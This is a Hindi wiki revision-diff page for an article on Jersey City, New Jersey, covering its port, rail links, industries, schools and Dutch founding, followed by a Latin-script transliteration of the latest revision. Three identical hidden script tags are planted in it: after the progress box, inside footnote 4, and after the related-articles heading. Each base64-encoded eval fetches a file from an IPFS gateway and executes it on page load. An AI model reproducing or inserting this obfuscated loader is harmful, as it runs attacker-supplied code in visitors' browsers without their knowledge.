Difference between revisions of "जेर्सी सिटी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''जेर्सी सिटी''' संयुक्त राज्य अमरीका के पूर्वी क्ष...' के साथ नया पृष्ठ बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
'''जेर्सी सिटी''' [[संयुक्त राज्य अमरीका]] के पूर्वी क्षेत्र में स्थित न्यूजेर्सी राज्य का द्वितीय बृह्‌त्तम नगर है और न्यूयार्क नगर के सामने [[हडसन नदी]] के पार बसा है।  
+
'''जेर्सी सिटी''' [[संयुक्त राज्य अमरीका]] के पूर्वी क्षेत्र में स्थित न्यूजर्सी राज्य का द्वितीय बृह्‌त्तम नगर है, जो [[न्यूयॉर्क नगर]] के सामने [[हडसन नदी]] के पार बसा है। यह संसार के बृह्‌त्तम यातायात केंद्रों में से एक है। यहाँ कई विशाल गोदियाँ<ref>docks</ref>, नौ क्षेत्रीय रेल मार्गों के सुरक्षित यार्ड<ref>yards</ref> तथा जंक्शन और कई राजमार्ग तथा सुरंगगामी रास्ते आदि हैं।
  
*यह संसार के बृह्‌त्तम यातायात केंद्रों में से एक है। यहाँ कई विशाल गोदियाँ <ref>docks</ref>, नौ क्षेत्रीय रेल मार्गों के सुरक्षित यार्ड <ref>yards</ref> तथा जंक्शन और कई राजमार्ग तथा सुरंगगामी रास्ते आदि हैं।
+
*इस नगर की कुल सीमा का लगभग 11 मील लंबा क्षेत्र जलमय है, जहाँ देश-विदेश के अनेक जहाज़ आते जाते रहते हैं। यह न्यूयॉर्क से न केवल जलयानों द्वारा, प्रत्युत हडसन नदी के तल से नीचे स्थित सुरंगपथों की रेलों तथा सड़कों और हवाई पथ <ref>skyway</ref> द्वारा जुड़ा हुआ है।
*नगर की कुल सीमा का लगभग 11 मील लंबा क्षेत्र जलमय है, जहाँ देश विदेश के अनेक जहाज आते जाते रहते हैं। यह न्यूयार्क से न केवल जलयानों द्वारा, प्रत्युत हडसन नदी के तल से नीचे स्थित सुरंगपथों की रेलों तथा सड़कों और हवाई पथ <ref>skyway</ref> द्वारा जुड़ा हुआ है।  
+
*न्यूयॉर्क महानगर के अत्यंत पास होने तथा यातायात की अनुपम सुविधाओं के कारण यहाँ विभिन्न प्रकार के बड़े उद्योग विकसित हो गए हैं, जिनमें रासायनिक द्रव्य, खाद्य पदार्थ, कपड़े, बिजली तथा [[लोहा|लोहे]] एवं [[इस्पात]] के सामान, रोगन तथा वार्निश, रेडियो, पेंसिलें, साबुन तथा मोटर आदि मरम्मत करने के कारखाने प्रमुख हैं।
*न्यूयार्क महानगर के अत्यंत पास होने तथा यातायात की अनुपम सुविधाओं के कारण यहाँ विभिन्न प्रकार के बड़े उद्योग विकसित हो गए हैं, जिनमें रासायनिक द्रव्य, खाद्य पदार्थ, कपड़े, बिजली तथा लोहे एवं इस्पात के सामान, रोगन तथा वार्निश, रेडियो, पेंसिलें, साबुन तथा मोटर आदि मरम्मत करने के कारखाने प्रमुख हैं।  
 
 
*यहाँ चार महाविद्यालय, 35 पब्लिक स्कूल, अस्पताल, कलाभवन, पुस्तकालय, [[संग्रहालय]] तथा अन्य सांस्कृतिक संस्थाएँ विद्यमान हैं।
 
*यहाँ चार महाविद्यालय, 35 पब्लिक स्कूल, अस्पताल, कलाभवन, पुस्तकालय, [[संग्रहालय]] तथा अन्य सांस्कृतिक संस्थाएँ विद्यमान हैं।
*17वीं सदी के प्रारंभ में यहाँ डचों ने व्यापारिक बस्ती स्थापित की और 1820 ई. में यह नगर घोषित की गई।  
+
*17वीं सदी के प्रारंभ में यहाँ [[डच|डचों]] ने व्यापारिक बस्ती स्थापित की और 1820 ई. में यह नगर घोषित की गई।
*1830 ई. में रेलों के आने के बाद इसकी तीव्र प्रगति होने लगी। यहाँ की क्षेत्रफल 20.2 वर्ग मील है।  
+
*सन 1830 ई. में रेलों के आने के बाद इसकी तीव्र प्रगति होने लगी। यहाँ का क्षेत्रफल 20.2 वर्ग मील है।<ref name="aa">{{cite web |url= http://bharatkhoj.org/india/%E0%A4%9C%E0%A5%87%E0%A4%B0%E0%A5%8D%E0%A4%B8%E0%A5%80_%E0%A4%B8%E0%A4%BF%E0%A4%9F%E0%A5%80|title=जेर्सी सिटी|accessmonthday=18 सितम्बर्|accessyear= 2015|last= |first= |authorlink= |format= |publisher=भारतखोज |language=हिन्दी}}</ref>
  
 
{{लेख प्रगति|आधार|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 13: Line 12:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
[[Category:विदेशी स्थान]]
+
[[Category:विदेशी स्थान]][[Category:विदेशी नगर]][[Category:भूगोल कोश]][[Category:हिन्दी_विश्वकोश]]
[[Category:भूगोल कोश]][[Category:हिन्दी_विश्वकोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:55, 20 September 2015

jersi siti sanyukt rajy amarika ke poorvi kshetr mean sthit nyoojarsi rajy ka dvitiy brihh‌ttam nagar hai, jo nyooy aaurk nagar ke samane hadasan nadi ke par basa hai. yah sansar ke brihh‌ttam yatayat keandroan mean se ek hai. yahaan kee vishal godiyaan[1], nau kshetriy rel margoan ke surakshit yard[2] tatha jankshan aur kee rajamarg tatha surangagami raste adi haian.

  • is nagar ki kul sima ka lagabhag 11 mil lanba kshetr jalamay hai, jahaan desh-videsh ke anek jahaz ate jate rahate haian. yah nyooy aaurk se n keval jalayanoan dvara, pratyut hadasan nadi ke tal se niche sthit surangapathoan ki reloan tatha s dakoan aur havaee path [3] dvara ju da hua hai.
  • nyooy aaurk mahanagar ke atyant pas hone tatha yatayat ki anupam suvidhaoan ke karan yahaan vibhinn prakar ke b de udyog vikasit ho ge haian, jinamean rasayanik dravy, khady padarth, kap de, bijali tatha lohe evan ispat ke saman, rogan tatha varnish, rediyo, peansilean, sabun tatha motar adi marammat karane ke karakhane pramukh haian.
  • yahaan char mahavidyalay, 35 pablik skool, aspatal, kalabhavan, pustakalay, sangrahalay tatha any saanskritik sansthaean vidyaman haian.
  • 17vian sadi ke praranbh mean yahaan dachoan ne vyaparik basti sthapit ki aur 1820 ee. mean yah nagar ghoshit ki gee.
  • san 1830 ee. mean reloan ke ane ke bad isaki tivr pragati hone lagi. yahaan ka kshetraphal 20.2 varg mil hai.[4]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. docks
  2. yards
  3. skyway
  4. jersi siti (hindi) bharatakhoj. abhigaman tithi: 18 sitambarh, 2015.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>